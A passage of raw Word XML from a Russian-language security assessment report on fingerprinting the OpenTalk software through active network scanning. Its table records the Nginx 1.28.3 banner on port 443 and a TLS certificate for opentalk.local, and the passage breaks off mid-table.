      <w:r w:rsidRPr="00F0569E">
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">доступ и контроль над всеми учетными записями), </w:t>
      </w:r>
      <w:r w:rsidR="003A5828">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Nginx</w:t>
      </w:r>
      <w:r w:rsidR="006B5B72" w:rsidRPr="006B5B72">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F0569E">
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">единственный доступ извне), </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001211A6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>utoheal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001211A6" w:rsidRPr="001211A6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F0569E">
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">служебный компонент </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>docker</w:t>
      </w:r>
      <w:r>
        <w:t>, остановка работы контейнеров)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0966A66E" w14:textId="2A93CF50" w:rsidR="00C477E6" w:rsidRDefault="00C477E6" w:rsidP="00ED0CD2">
      <w:pPr>
        <w:pStyle w:val="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Выявление </w:t>
      </w:r>
      <w:r w:rsidR="00AB7761">
        <w:t>ПО</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C0DBBC6" w14:textId="77777777" w:rsidR="00CE1680" w:rsidRDefault="0075743D" w:rsidP="00371AF1">
      <w:pPr>
        <w:pStyle w:val="130"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Выявление посредством активного сетевого </w:t>
      </w:r>
      <w:r w:rsidR="00287A86">
        <w:t>сканировании</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1881F79F" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00287A86" w:rsidP="00287A86">
      <w:pPr>
        <w:pStyle w:val="114"/>
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69C6C4A8" w14:textId="42F10FFB" w:rsidR="00287A86" w:rsidRPr="006B5B72" w:rsidRDefault="00287A86" w:rsidP="00287A86">
      <w:pPr>
        <w:pStyle w:val="114"/>
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:sectPr w:rsidR="00287A86" w:rsidRPr="006B5B72" w:rsidSect="00975080">
          <w:headerReference w:type="default" r:id="rId9"/>
          <w:footerReference w:type="default" r:id="rId10"/>
          <w:type w:val="continuous"/>
          <w:pgSz w:w="11906" w:h="16838" w:code="9"/>
          <w:pgMar w:top="1134" w:right="851" w:bottom="851" w:left="1701" w:header="567" w:footer="340" w:gutter="0"/>
          <w:pgNumType w:start="1"/>
          <w:cols w:space="720"/>
          <w:titlePg/>
          <w:docGrid w:linePitch="381"/>
        </w:sectPr>
      </w:pPr>
      <w:r w:rsidRPr="00287A86">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>В рамках исследования</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> была</w:t>
      </w:r>
      <w:r w:rsidRPr="00287A86">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> выполнена оценка возможности идентификации исследуемого ПО методом активного сетевого сканирования</w:t>
      </w:r>
      <w:r w:rsidR="003E531F">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> при помощи </w:t>
      </w:r>
      <w:r w:rsidRPr="00287A86">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>инструмент</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>ов</w:t>
      </w:r>
      <w:r w:rsidRPr="00287A86">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006B5B72">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>N</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>uclei</w:t>
      </w:r>
      <w:r w:rsidR="003E531F" w:rsidRPr="003E531F">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="003E531F" w:rsidRPr="00287A86">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>выявлени</w:t>
      </w:r>
      <w:r w:rsidR="003E531F">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidR="003E531F" w:rsidRPr="00287A86">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> признаков конкретных компонентов</w:t>
      </w:r>
      <w:r w:rsidR="003E531F" w:rsidRPr="003E531F">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00287A86">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00127AD1">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>Whatweb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00127AD1">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> (сканирование портов),</w:t>
      </w:r>
      <w:r w:rsidRPr="00287A86">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidR="006B5B72" w:rsidRPr="006B5B72">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006B5B72">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
      <w:r w:rsidR="009A505E" w:rsidRPr="009A505E">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003E531F">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="003E531F" w:rsidRPr="00287A86">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>анализа HTTP-заголовков, TLS-сертификатов</w:t>
      </w:r>
      <w:r w:rsidR="003E531F">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>),</w:t>
      </w:r>
      <w:r w:rsidRPr="00287A86">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>для</w:t>
      </w:r>
      <w:r w:rsidRPr="00287A86">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> выявлени</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>я</w:t>
      </w:r>
      <w:r w:rsidRPr="00287A86">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> версии ПО.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> Для сканирования использовались инструменты</w:t>
      </w:r>
      <w:r w:rsidR="003E531F">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003E531F" w:rsidRPr="00287A86">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">Результаты представлены в </w:t>
      </w:r>
      <w:r w:rsidR="00D80616">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="003E531F">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="003E531F">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> REF _Ref234279983 \r \h \</w:instrText>
      </w:r>
      <w:r w:rsidR="003E531F">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:instrText>t</w:instrText>
      </w:r>
      <w:r w:rsidR="003E531F">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidR="003E531F">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00D80616">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>таблице</w:t>
      </w:r>
      <w:r w:rsidR="003E531F">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1.4</w:t>
      </w:r>
      <w:r w:rsidR="003E531F">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00D80616">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="003E531F" w:rsidRPr="00287A86">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B86F360" w14:textId="6BFD6A41" w:rsidR="00CE1680" w:rsidRPr="00495F80" w:rsidRDefault="00CE1680" w:rsidP="00495F80">
      <w:pPr>
        <w:pStyle w:val="19"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Ref234279983"/>
      <w:r w:rsidRPr="00495F80">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">– Перечень признаков идентификации </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003A5828">
        <w:t>OpenTalk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00495F80">
        <w:t xml:space="preserve"> посредством активного сетевого сканирования</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="ac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126"/>
        <w:gridCol w:w="5082"/>
        <w:gridCol w:w="2473"/>
        <w:gridCol w:w="2473"/>
      </w:tblGrid>
      <w:tr w:rsidR="00CE1680" w:rsidRPr="00495F80" w14:paraId="3CB2227E" w14:textId="77777777" w:rsidTr="001211A6">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr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37387" w14:textId="77777777" w:rsidR="00CE1680" w:rsidRPr="00C82B97" w:rsidRDefault="00CE1680" w:rsidP="004B22D3">
            <w:pPr>
              <w:pStyle w:val="1121"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C82B97">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>№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3F117" w14:textId="77777777" w:rsidR="00CE1680" w:rsidRPr="00C82B97" w:rsidRDefault="00CE1680" w:rsidP="004B22D3">
            <w:pPr>
              <w:pStyle w:val="1121"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C82B97">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Порт, сервис</w:t>
            </w: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4BA54" w14:textId="77777777" w:rsidR="00CE1680" w:rsidRPr="00C82B97" w:rsidRDefault="00CE1680" w:rsidP="004B22D3">
            <w:pPr>
              <w:pStyle w:val="1121"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C82B97">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Служба</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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CDA1F" w14:textId="77777777" w:rsidR="00CE1680" w:rsidRPr="00C82B97" w:rsidRDefault="00CE1680" w:rsidP="004B22D3">
            <w:pPr>
              <w:pStyle w:val="1121"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C82B97">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Признак идентификации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942E" w14:textId="77777777" w:rsidR="00CE1680" w:rsidRPr="00C82B97" w:rsidRDefault="00CE1680" w:rsidP="004B22D3">
            <w:pPr>
              <w:pStyle w:val="1121"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C82B97">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Возможность выявления версии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97609" w14:textId="77777777" w:rsidR="00CE1680" w:rsidRPr="00C82B97" w:rsidRDefault="00CE1680" w:rsidP="004B22D3">
            <w:pPr>
              <w:pStyle w:val="1121"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C82B97">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Комментарий</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CE1680" w:rsidRPr="00BF5EB3" w14:paraId="579E9DA4" w14:textId="77777777" w:rsidTr="001211A6">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr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212D8" w14:textId="77777777" w:rsidR="00CE1680" w:rsidRPr="00BF5EB3" w:rsidRDefault="00CE1680" w:rsidP="004B22D3">
            <w:pPr>
              <w:pStyle w:val="1121"/>
            </w:pPr>
            <w:r w:rsidRPr="00BF5EB3">
              <w:t>1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99E7E" w14:textId="77777777" w:rsidR="00CE1680" w:rsidRPr="00BF5EB3" w:rsidRDefault="00CE1680" w:rsidP="004B22D3">
            <w:pPr>
              <w:pStyle w:val="1121"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BF5EB3">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>443/TCP</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A422031" w14:textId="77777777" w:rsidR="00CE1680" w:rsidRPr="00BF5EB3" w:rsidRDefault="00CE1680" w:rsidP="004B22D3">
            <w:pPr>
              <w:pStyle w:val="1121"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BF5EB3">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>HTTPS</w:t>
            </w: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9B82B" w14:textId="112C4F7F" w:rsidR="00CE1680" w:rsidRPr="00BF5EB3" w:rsidRDefault="003A5828" w:rsidP="004B22D3">
            <w:pPr>
              <w:pStyle w:val="1121"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Nginx</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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16B5F" w14:textId="52758192" w:rsidR="001211A6" w:rsidRPr="001211A6" w:rsidRDefault="001211A6" w:rsidP="004B22D3">
            <w:pPr>
              <w:pStyle w:val="1121"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001211A6">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>«</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidR="00CE1680" w:rsidRPr="00BF5EB3">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>HTTPServer</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00CE1680" w:rsidRPr="00BF5EB3">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="00CE1680" w:rsidRPr="00BF5EB3">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Ubuntu </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidR="00CE1680" w:rsidRPr="00BF5EB3">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Linux][</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="003A5828">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Nginx</w:t>
            </w:r>
            <w:r w:rsidR="00CE1680" w:rsidRPr="00BF5EB3">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>/1.28.3 (Ubuntu</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidR="00CE1680" w:rsidRPr="00BF5EB3">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>)]</w:t>
            </w:r>
            <w:r w:rsidRPr="001211A6">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>»</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="5CD5B62A" w14:textId="44BB137A" w:rsidR="001211A6" w:rsidRPr="001211A6" w:rsidRDefault="00CE1680" w:rsidP="004B22D3">
            <w:pPr>
              <w:pStyle w:val="1121"/>
            </w:pPr>
            <w:r w:rsidRPr="00BF5EB3">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00BF5EB3">
              <w:t>при</w:t>
            </w:r>
            <w:r w:rsidRPr="00BF5EB3">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00BF5EB3">
              <w:t>сканировании</w:t>
            </w:r>
            <w:r w:rsidRPr="00BF5EB3">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="006B5B72">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Whatweb</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="057797D1" w14:textId="77777777" w:rsidR="00CE1680" w:rsidRPr="00BF5EB3" w:rsidRDefault="00CE1680" w:rsidP="004B22D3">
            <w:pPr>
              <w:pStyle w:val="1121"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pP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EEDD" w14:textId="406FA8D3" w:rsidR="00CE1680" w:rsidRPr="00BF5EB3" w:rsidRDefault="00CE1680" w:rsidP="004B22D3">
            <w:pPr>
              <w:pStyle w:val="1121"/>
            </w:pPr>
            <w:r w:rsidRPr="00BF5EB3">
              <w:t xml:space="preserve">Сканирование </w:t>
            </w:r>
            <w:r w:rsidR="006B5B72">
              <w:t>N</w:t>
            </w:r>
            <w:r w:rsidRPr="00BF5EB3">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>map</w:t>
            </w:r>
            <w:r w:rsidRPr="00BF5EB3">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="006B5B72">
              <w:t>Whatweb</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00BF5EB3">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidR="006B5B72">
              <w:t>N</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00BF5EB3">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>uclei</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00BF5EB3">
              <w:t xml:space="preserve"> определяет обратный прокси-сервер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36821" w14:textId="5EC7434D" w:rsidR="00CE1680" w:rsidRPr="00BF5EB3" w:rsidRDefault="00CE1680" w:rsidP="004B22D3">
            <w:pPr>
              <w:pStyle w:val="1121"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BF5EB3">
              <w:t>Единственный порт доступный с внешней сети</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">. Версия </w:t>
            </w:r>
            <w:r w:rsidR="003A5828">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Nginx</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> 1.28.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CE1680" w:rsidRPr="00BF5EB3" w14:paraId="409636B9" w14:textId="77777777" w:rsidTr="001211A6">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr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8CBE" w14:textId="77777777" w:rsidR="00CE1680" w:rsidRPr="00BF5EB3" w:rsidRDefault="00CE1680" w:rsidP="004B22D3">
            <w:pPr>
              <w:pStyle w:val="1121"/>
            </w:pPr>
            <w:r>
              <w:t>2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5202" w14:textId="77777777" w:rsidR="00CE1680" w:rsidRPr="00BF5EB3" w:rsidRDefault="00CE1680" w:rsidP="004B22D3">
            <w:pPr>
              <w:pStyle w:val="1121"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BF5EB3">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>HTTPS(TLS)</w:t>
            </w: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C94D" w14:textId="77777777" w:rsidR="00CE1680" w:rsidRPr="00BF5EB3" w:rsidRDefault="00CE1680" w:rsidP="004B22D3">
            <w:pPr>
              <w:pStyle w:val="1121"/>
            </w:pPr>
            <w:r w:rsidRPr="00BF5EB3">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>TLS-</w:t>
            </w:r>
            <w:r w:rsidRPr="00BF5EB3">
              <w:t>сертификат</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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DC0F" w14:textId="42D35F65" w:rsidR="001211A6" w:rsidRPr="00C54DEE" w:rsidRDefault="001211A6" w:rsidP="004B22D3">
            <w:pPr>
              <w:pStyle w:val="1121"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001211A6">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>«</w:t>
            </w:r>
            <w:r w:rsidR="00CE1680">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00CE1680">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>ssl</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00CE1680">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00CE1680">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>dns</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00CE1680">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">-names] </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidR="00CE1680">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>opentalk.local</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="00CE1680">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>:443</w:t>
            </w:r>
            <w:r w:rsidRPr="001211A6">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>»</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C218D6A" w14:textId="77777777" w:rsidR="001211A6" w:rsidRPr="00C54DEE" w:rsidRDefault="001211A6" w:rsidP="004B22D3">
            <w:pPr>
              <w:pStyle w:val="1121"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="171E66A9" w14:textId="6182C029" w:rsidR="001211A6" w:rsidRPr="001211A6" w:rsidRDefault="001211A6" w:rsidP="004B22D3">
            <w:pPr>
              <w:pStyle w:val="1121"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001211A6">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>«</w:t>
            </w:r>
            <w:r w:rsidR="00CE1680" w:rsidRPr="00BF5EB3">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>["</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidR="00CE1680" w:rsidRPr="00BF5EB3">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>opentalk.local</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="00CE1680" w:rsidRPr="00BF5EB3">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>","</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidR="00CE1680" w:rsidRPr="00BF5EB3">
              <w:rPr>
